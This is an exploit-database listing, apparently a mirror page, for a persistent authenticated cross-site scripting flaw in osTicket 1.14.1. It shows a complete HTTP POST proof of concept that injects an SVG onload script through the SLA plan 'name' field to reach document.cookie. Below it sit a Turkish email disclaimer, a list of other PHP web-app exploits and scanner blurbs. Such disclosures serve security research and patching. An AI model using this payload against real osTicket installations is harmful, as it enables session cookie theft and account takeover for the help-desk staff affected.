Search for hundreds of thousands of exploits

"osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting"

Author

Exploit author

"Mehmet Kelepçe"

Platform

Exploit platform

php

Release date

Exploit published date

2020-05-04

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Title: osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting
# Author: Mehmet Kelepce / Gais Cyber Security
# Date : 2020-03-24
# Source Link: https://github.com/osticket/osticket/commit/fc4c8608fa122f38673b9dddcb8fef4a15a9c884
# Vendor: http://osticket.com
# Remotely Exploitable: Yes
# Dynamic Coding Language: PHP
# CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L)

## this vulnerability was found by examining the source code.

PoC : Ticket SLA Plan Name - HTTP POST REQUEST
##########################################################
POST /upload/scp/slas.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/upload/scp/slas.php?id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Connection: close
Cookie: cookie=3333; OSTSESSID=684d6hn7dfk869kupbhc9hq2qv
Upgrade-Insecure-Requests: 1

submit=Save+Changes&__CSRFToken__=6174a3343a6277b2e5faae240188d54624a756d7&do=update&a=&id=1&name=%3Csvg+onload%3Dconfirm%28document.cookie%29%3B%3E&isactive=1&grace_period=48&schedule_id=0&notes=

Vulnerable parameter: name
Parameter file: /scp/slass.php

I used the name of the SLA for any ticket.

## Risk : cookie information of the target user is obtained.

# Bu e-posta mesajı ve eklerinde yer alan içerikler gönderildiği kişi ya da firmaya özeldir. Ayrıca hukuken de gizli olabilir. Hiçbir şekilde üçüncü kişilere açıklanamaz ve yayınlanamaz. 
# Eğer bu mesajı hataen aldıysanız lütfen durumu gönderen kişiye derhal bildiriniz ve mesajı sisteminizden siliniz. Mesajın yetkili alıcısı değilseniz hiçbir kısmını kopyalayamaz, başkasına 
# gönderemez veya hiçbir şekilde bu mesajı kullanamazsınız. Eğer mesajın yetkili alıcısı veya yetkili alıcısına iletmekten sorumlu kişi siz değilseniz, lütfen mesajı sisteminizden siliniz 
# ve göndereni uyarınız. İnternet iletişiminde tam güvenlik ve hatasız gönderim garanti edilemeyeceğinden; mesajın yerine ulaşmaması, geç ulaşması ya da içeriğinin bozulması gibi problemler 
# de oluşabilir. Gönderen ve GAİS (Gais Siber Güvenlik Teknolojileri Ltd. Şti.) bu mesajın içerdiği bilgilerin doğruluğu, bütünlüğü ve güncelliği konusunda bir garanti vermemektedir. 
# Mesajın içeriğinden, iletilmesinden, alınmasından, saklanmasından, gizliliğinin korunmamasından, virüs içermesinden ve sisteminizde yaratabileceği olası zararlardan GAİS sorumlu tutulamaz.
Release DateTitleTypePlatformAuthor
2020-09-18"Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)"webappsphp"Nikolas Geiselman"
2020-09-16"Piwigo 2.10.1 - Cross Site Scripting"webappsphpIridium
2020-09-15"Tailor MS 1.0 - Reflected Cross-Site Scripting"webappsphpboku
2020-09-15"ThinkAdmin 6 - Arbitrarily File Read"webappsphpHzllaga
2020-09-14"Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)"webappsphp"Mehmet Kelepçe"
2020-09-10"CuteNews 2.1.2 - Remote Code Execution"webappsphp"Musyoka Ian"
2020-09-09"Tailor Management System - 'id' SQL Injection"webappsphpMosaaed
2020-09-07"grocy 2.7.1 - Persistent Cross-Site Scripting"webappsphp"Mufaddal Masalawala"
2020-09-03"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)"webappsphpV1n1v131r4
2020-09-03"Daily Tracker System 1.0 - Authentication Bypass"webappsphp"Adeeb Shah"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48413/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.